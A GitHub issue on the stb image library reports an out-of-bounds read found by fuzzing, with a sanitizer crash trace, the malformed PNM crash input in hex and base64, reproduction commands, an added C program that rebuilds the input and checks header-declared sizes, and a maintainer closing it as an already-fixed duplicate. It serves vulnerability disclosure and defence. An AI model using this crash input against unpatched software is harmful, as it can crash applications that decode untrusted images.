nothings / stb

stb single-file public domain libraries for C/C++
https://twitter.com/nothings

An OOB-read vulnerability exists in the function stbi__load_and_postprocess_8bit in stb #1438

Closed. migraine-sudo closed this 1 year ago

migraine-sudo commented 1 year ago

Crash Info

UndefinedBehaviorSanitizer:DEADLYSIGNAL
==155582==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x55d181ff9001 (pc 0x55d1803a7480 bp 0x7ffe3d6470c0 sp 0x7ffe3d646850 T155582)
==155582==The signal is caused by a READ memory access.
    #0 0x55d1803a7480 in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) stbi_read_fuzzer.c
    #1 0x55d1803ad01f in LLVMFuzzerTestOneInput (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x8501f) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #2 0x55d1803635f3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3b5f3) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #3 0x55d180362d49 in fuzzer::Fuzzer::RunOne(unsigned char const*, unsigned long, bool, fuzzer::InputInfo*, bool, bool*) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3ad49) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #4 0x55d180364539 in fuzzer::Fuzzer::MutateAndTestOne() (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3c539) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #5 0x55d1803650b5 in fuzzer::Fuzzer::Loop(std::vector<fuzzer::SizedFile, std::allocator<fuzzer::SizedFile> >&) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x3d0b5) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #6 0x55d1803531f2 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x2b1f2) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #7 0x55d18037cee2 in main (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x54ee2) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)
    #8 0x7f02d8a0ad8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #9 0x7f02d8a0ae3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #10 0x55d180347c34 in _start (/home/migraine/下载/stb/tests/out/stbi_read_fuzzer+0x1fc34) (BuildId: 72ff4c6216f4c1d21697a8ed9a9eea3a98e90883)

UndefinedBehaviorSanitizer can not provide additional info.
SUMMARY: UndefinedBehaviorSanitizer: SEGV stbi_read_fuzzer.c in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int)
==155582==ABORTING
MS: 2 ChangeASCIIInt-CopyPart-; base unit: f884ca9cd651b733861ac0811006e1766fbb9a1c
0x50,0x36,0x39,0x39,0x35,0x23,0xa,0x39,0x30,0x39,0xb,0x23,0x35,0x23,0xa,0x39,0x30,0x39,0xb,0x23,0x39,0x23,0xa,0x32,0x23,
P6995#\012909\013#5#\012909\013#9#\0122#
artifact_prefix='./'; Test unit written to ./crash-6f3abb24d907f9b2ae99f8f960d997bb1a4eef17
Base64: UDY5OTUjCjkwOQsjNSMKOTA5CyM5IwoyIw==

How to Crash

Command

$ git clone https://github.com/nothings/stb.git && cd stb/tests
$ mkdir -p out
$ # the report above comes from UndefinedBehaviorSanitizer, so build with it as well as libFuzzer
$ clang++ -O1 -fsanitize=fuzzer,undefined -std=c++11 stbi_read_fuzzer.c -o out/stbi_read_fuzzer
$ ./out/stbi_read_fuzzer poc

poc in attachment stb2-poc.zip
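The byte dump and base64 string in the crash report are enough to rebuild the crash file without the zip attachment. The following is an added example, not code from the stb project or from the reporter: it embeds those 25 bytes, parses them as a PNM (P5/P6) header using the format's tolerant grammar (whitespace and `#` comments between fields), and compares the sample data the header declares against what the file actually contains. That maxval > 255 means two bytes per sample is the PNM convention; that the decoder under test sizes its buffers the same way is an assumption here, not something the report states. `pnm_payload_complete` is a hypothetical pre-decode gate of the kind an application embedding an image decoder can put in front of fuzzer-shaped inputs.

```c
/*
 * Added example (not stb code and not the reporter's code): rebuild the
 * libFuzzer crash input from the byte dump in the report and inspect what
 * its PNM header declares. Header grammar: magic, then width, height and
 * maxval as decimal fields separated by whitespace and/or '#' comments that
 * run to end of line, then exactly one whitespace byte, then raw samples.
 * maxval > 255 means 16-bit samples (PNM convention; assumed to match how
 * the decoder under test sizes its buffers).
 */
#include <stddef.h>
#include <stdio.h>

/* The 25 bytes libFuzzer printed for crash-6f3abb24..., copied from the report. */
static const unsigned char poc[] = {
    0x50,0x36,0x39,0x39,0x35,0x23,0x0a,0x39,0x30,0x39,0x0b,0x23,0x35,0x23,0x0a,
    0x39,0x30,0x39,0x0b,0x23,0x39,0x23,0x0a,0x32,0x23
};
#define POC_LEN (sizeof poc)

struct pnm_header {
    int channels;          /* 1 for P5 (greyscale), 3 for P6 (RGB) */
    int width, height, maxval;
    int bytes_per_sample;  /* 1 if maxval <= 255, else 2 */
    size_t header_len;     /* offset of the first sample byte */
};

static int pnm_isspace(unsigned char c) {
    return c == ' ' || c == '\t' || c == '\n' || c == '\v' || c == '\f' || c == '\r';
}

/* Skip whitespace and '#'-to-end-of-line comments starting at *pos. */
static void pnm_skip(const unsigned char *buf, size_t len, size_t *pos) {
    while (*pos < len) {
        if (pnm_isspace(buf[*pos])) { (*pos)++; continue; }
        if (buf[*pos] != '#') break;
        while (*pos < len && buf[*pos] != '\n' && buf[*pos] != '\r') (*pos)++;
    }
}

/* Parse a decimal field; fails if no digit is present or the value exceeds 2^24 (sanity cap). */
static int pnm_int(const unsigned char *buf, size_t len, size_t *pos, int *out) {
    int v = 0, n = 0;
    while (*pos < len && buf[*pos] >= '0' && buf[*pos] <= '9') {
        v = v * 10 + (buf[*pos] - '0');
        if (v > (1 << 24)) return 0;
        (*pos)++; n++;
    }
    *out = v;
    return n > 0;
}

/* Returns 1 and fills *h on success, 0 on a malformed header. */
int pnm_parse_header(const unsigned char *buf, size_t len, struct pnm_header *h) {
    size_t pos = 2;
    if (len < 2 || buf[0] != 'P' || (buf[1] != '5' && buf[1] != '6')) return 0;
    h->channels = (buf[1] == '6') ? 3 : 1;
    pnm_skip(buf, len, &pos);
    if (!pnm_int(buf, len, &pos, &h->width)) return 0;
    pnm_skip(buf, len, &pos);
    if (!pnm_int(buf, len, &pos, &h->height)) return 0;
    pnm_skip(buf, len, &pos);
    if (!pnm_int(buf, len, &pos, &h->maxval)) return 0;
    if (h->maxval < 1 || h->maxval > 65535) return 0;
    if (pos >= len || !pnm_isspace(buf[pos])) return 0;  /* single separator before samples */
    pos++;
    h->bytes_per_sample = (h->maxval > 255) ? 2 : 1;
    h->header_len = pos;
    return 1;
}

/* Bytes of raw sample data the header promises. */
size_t pnm_declared_payload(const struct pnm_header *h) {
    return (size_t)h->width * (size_t)h->height * (size_t)h->channels * (size_t)h->bytes_per_sample;
}

/* Bytes actually present after the header. */
size_t pnm_actual_payload(const struct pnm_header *h, size_t len) {
    return len > h->header_len ? len - h->header_len : 0;
}

/* Hypothetical application-side gate: accept only buffers that carry every
 * sample byte the header declares. Returns 1 if complete, 0 otherwise. */
int pnm_payload_complete(const unsigned char *buf, size_t len) {
    struct pnm_header h;
    if (!pnm_parse_header(buf, len, &h)) return 0;
    return pnm_actual_payload(&h, len) >= pnm_declared_payload(&h);
}

/* Write the crash input to disk so it can be fed to the fuzzer binary as "poc". */
int write_poc_file(const char *path) {
    FILE *f = fopen(path, "wb");
    if (!f) return 0;
    size_t n = fwrite(poc, 1, POC_LEN, f);
    return fclose(f) == 0 && n == POC_LEN;
}

int main(void) {
    struct pnm_header h;
    if (!pnm_parse_header(poc, POC_LEN, &h)) { puts("header did not parse"); return 1; }
    printf("P%c: %dx%d, %d channel(s), maxval %d -> %d byte(s)/sample\n",
           h.channels == 3 ? '6' : '5', h.width, h.height, h.channels, h.maxval, h.bytes_per_sample);
    printf("declared sample bytes: %zu, present: %zu, complete: %s\n",
           pnm_declared_payload(&h), pnm_actual_payload(&h, POC_LEN),
           pnm_payload_complete(poc, POC_LEN) ? "yes" : "no");
    if (write_poc_file("poc")) puts("wrote ./poc");
    return 0;
}
```

Run on its own it reports a P6 header of 995x909 with maxval 909, so two bytes per sample and about 5.4 MB of declared sample data, while only 6 bytes follow the header; it also writes `./poc` for the reproduction command above. The gate is not a fix for the decoder, it only refuses inputs whose declared geometry cannot be backed by the buffer, which is a cheap application-side defence while a decoder's handling of such inputs is in question.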

rygorous commented 1 year ago

Thanks for the repro! Appears to be a duplicate of #1225 or possibly #1166. Either way, your PoC does not trigger UB anymore in current dev branch, which fixes these issues. Will close as duplicate, fix will be in the next release.